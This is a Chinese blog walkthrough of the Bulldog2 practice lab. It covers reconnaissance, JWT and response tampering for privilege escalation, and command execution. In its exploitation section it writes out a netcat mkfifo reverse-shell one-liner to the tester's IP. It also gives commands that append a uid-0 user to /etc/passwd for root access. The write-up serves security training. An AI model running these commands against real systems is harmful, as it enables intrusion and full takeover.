靶机实战(bulldog2)

最新推荐文章于 2024-05-14 17:43:37 发布
最新推荐文章于 2024-05-14 17:43:37 发布
阅读量407 收藏
点赞数
分类专栏: 靶机实战 文章标签: 安全漏洞 黑盒测试 测试工程师 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605313/article/details/106408257
版权

bulldog2

实验环境

靶机:bulldog2
测试机:kali,win10

实验过程

信息收集

1.主机发现

靶机IP:192.168.238.149
在这里插入图片描述

2.端口扫描

只有80 端口
在这里插入图片描述
扫描服务,http开启的方法
在这里插入图片描述

3.目录扫描

在这里插入图片描述
没有什么有用的东西
在这里插入图片描述

4.漏洞发现

可以用searchsploit搜下nginx漏洞
在这里插入图片描述
页面发现登录和注册地址,尝试弱口令,爆破,万能密码,逻辑漏洞等
在这里插入图片描述
注册页面被限制
在这里插入图片描述
审查元素看一下,有无特殊路径,和前端源码
在这里插入图片描述
main.js文件中发现用户名遍历漏洞得到所有用户名
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现注册路径和关键参数
在这里插入图片描述
在这里插入图片描述
改包发送
在这里插入图片描述
登录成功
在这里插入图片描述
再注册一个查看是否存在越权
在这里插入图片描述
存在水平越权
在这里插入图片描述
登陆页面抓包重放,发现关键参数:“auth_level”:"standard_user"
在这里插入图片描述
回到main.js搜索关键字auth_level,发现管理员参数尝试垂直越权
在这里插入图片描述
https://jwt.io 解码
在这里插入图片描述
修改auth_level参数
在这里插入图片描述
利用bp修改回包
在这里插入图片描述
在这里插入图片描述
admin修改密码页面
在这里插入图片描述
尝试修改密码,将回报false改为true
在这里插入图片描述
提示登陆成功,但没什么效果
在这里插入图片描述
最后在github找源码发现命令执行漏洞
在这里插入图片描述

漏洞利用

反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1|nc 192.168.238.143 443 >/tmp/f

在这里插入图片描述
在这里插入图片描述

提权

etc/passwd文件权限配置不当
在这里插入图片描述
生成密码

perl -le ‘print crypt('pass','aa')’

将用户名密码追加到passwd下

echo 'abcd:aaW3cJZ7OSoQM:0:0:dirty:/root:/bin/bash '>> /etc/passwd

在这里插入图片描述

在这里插入图片描述

总结

在发现只有80端口时,除常规web漏洞,还有http的PUT方法需验证 ;
可以审查查元素,看特殊路劲,和前端源码,或在github上找下源码,
对漏洞发现有很大帮助;登录口,可以抓包看回包的关键参数 (true,false,fail,suess等)进行修改尝试逻辑漏洞;有注册,可以先注册个
账户 再尝试水平,垂直越权等;拿到shell先看一些关键配置文件

~~...
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
burp改返回包(Burp Suite抓包使用步骤)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-20 8303
burp改返回包方法:burp改返回包在抓到包之后, 然后设置Action:do intercept -> response to this request (burp改返回包),点击Forward即可。 下面介绍Burp Suite抓包使用步骤 1、打开Burp.调整Proxy-Intercept-Intercept is on为‘Intercept is off’(拦截器开关) ​2、在火狐中打开需要拦截的网页,(比如同charlse博客里面写到的上传1.txt文件),点击上传文件按钮
BurpSuite修改返回数据
浪子燕青的博客
02-23 6828
BurpSuite修改返回数据 再拦截页面的设置选项中勾选拦截服务段数据 ] 访问博客 拦截页面右键选择拦截返回消息 然后forward发送 这里是服务返回的数据,还没有传递到浏览器,可以在这里修改数据 然后在此forward发送 这里的数据就修改好了 顺便提一点burp怎么设置拦截名单,比如不拦截google,firefox站点请求 在这里设置即可 firefox\.com$ firefox\.com\.cn$ mozilla\.com$ mozilla\.net$ mozilla\.org$
Brpc学习 简单回显服务器 客户端_bp修改了包之后没有response received from remote server
最新发布
2401_84976285的博客
05-14 1065
但注意,这里的“pthread私有变量”不是通过pthread_key_create创建的,使用pthread_key_create创建的pthread-local是无法被bthread_getspecific访问到的,这是两个独立的体系。由于brpc会为每个请求建立一个bthread,server中的bthread-local行为特殊:一个server创建的bthread在退出时并不删除bthread-local,而是还回server的一个pool中,以被其他bthread复用。这对于用户是透明的。
使用BP(burp suite)修改HTTP响应消息
yumiweitaozi的博客
03-31 5856
网页输入localhost查看 Intercept is on 拦截信息 发现网页一直在加载 然后使用BP查看拦截到的数据包 在action里的do intercept 里点击response to this request 然后点击 就能在网页页面不会跳转到响应后的界面的情况下在 BP里查看页面的响应信息, (如果这里直接点击forward不点击re...
Burpsuit使用03:拦截请求并修改响应
汪敏的博客
06-16 6299
burpsuite是渗透的必备工具,使用它可以进行一些截包分析,修改包数据、暴力破解、扫描等功能,使用最多的场景应该是设置代理拦截数据包分析数据和爆破。
Burp Suite修改响应包字段
热门推荐
stybill的博客
10-14 5万+
抓到包之后 设置Action:do intercept -> response to this request 点击Forward即可
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
CTF6靶机实战.zip
05-25
本压缩包“CTF6靶机实战.zip”显然是一份用于CTF比赛的学习资料,包含了实战过程、反弹shell文件以及针对特定系统版本漏洞的利用脚本。 首先,我们要理解靶机的概念。在网络安全领域,靶机是模拟真实网络环境的...
靶机操作练习,earth 靶机实战练习
09-08
通过这样的实战练习,我们可以更深入地理解网络攻防技术,提高安全意识和应对能力。同时,这也提醒我们,对于系统安全,应确保及时更新补丁,限制不必要的服务,以及设置强密码,以防止类似攻击的发生。
靶机happycorp实战练习
09-08
学习
BurpSuite基本使用(持续更新中)
m0_73912575的博客
01-17 1455
BurpSuite基本使用
使用burpsuite伪造数据包数据
m0_60121089的博客
09-19 2524
代理设置:本地环回地址(如:127.0.0.1)和端口(8080),浏览器请求的数据包就会先发送到127.0.0.1:8080上,然后在转发给服务端。使用bp在127.0.0.1:8080上监听,开启拦截功能,就会抓到请求的数据包,点击forward才将数据包转发给服务端。根据题目要求,使用bp抓取关键数据包,更改数据包的数据,再转发出去,达到伪造的效果。搜索引擎可以辅助解题。
burpsuit 截取返回并修改
huitest的博客
03-08 6163
1、配置 2、发送请求后,对请求进行设置 3、截取到返回进行修改后放行
新版Burp Suit抓包拦截请求并修改响应
西凉的悲伤博客
05-27 1万+
1.安装Burp Suite 如果你没安装Burp Suite,可以参考 新版Burp Suite安装 进行安装 2.打开Burp Suit 点击next 点击Start Burp 3.点击Proxy (代理),选择 Intercept(拦截器) 2.1 点击Open Browser 会打开一个自带的浏览器,输入一个 url 网址回车。(我这里输入了 https://www.csdn.net/ 进行测试) 2.2 如果这个时候你想进行抓包可以点击 Intercept is off 开启开关进行抓包,然后
越权与业务逻辑漏洞
m0_51581045的博客
03-03 2773
越权与业务逻辑漏洞越权支付数据/登录逻辑问题验证与找回问题BP的爬虫使用 越权 漏洞原因: usertype为1时为管理员账户,其它为普通用户。 pikachu靶场实战: 水平越权:抓包改名字 垂直越权: 首先登录普通用户pikachu,可以看到对于普通用户pikachu来说只能看用户不能添加和删改。 那么登录管理员账号看看: 是可以添加账号的。 那么我们在添加账号时抓包获取session 把包发给repeater保存一下。 再登录普通用户: 在查看界面抓包, 打开repeater,用之前在ad
burpsuite修改response欺骗伪造高五商
黑面狐
04-29 9043
一、事情起因今天我的相亲群里又开始流行测五商了,分别是智商、情商、逆商、财商和性商。作为一个大龄资深老光棍肯定得表现出高五商,才能赢得女神关注。二、结果惨绝人寰我凭借着我的“高智商”认认真真的答完10道,BUT结果是这样子的这给女神知道还了得三、抓包分析请求因为是在微信上的程序,所以要本地burpsuite设置所有网卡的代理,然后把burpsuite的证书导入手机,手机要跟电脑在同一个网段上,然后...
通过修改返回包绕过部分机制的方法的小思考
bangke2340的博客
12-17 948
  在涉及到多步操作的某个业务中,经常通过修改返回包中的某些状态字来绕过部分检测。本文主要分析下为什么修改回应包会影响到服务端实际的业务处理。 1. 原理分析   先看看客户端与服务端是怎么交流的,如下图。   简单的来说,就是客户端发包给服务端,服务端想想怎么处理,处理完以后发个包回去。客户端收到这个回应包,更新一下显示的内容。那么从上面的这个过程中很清楚的知道,修改返...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值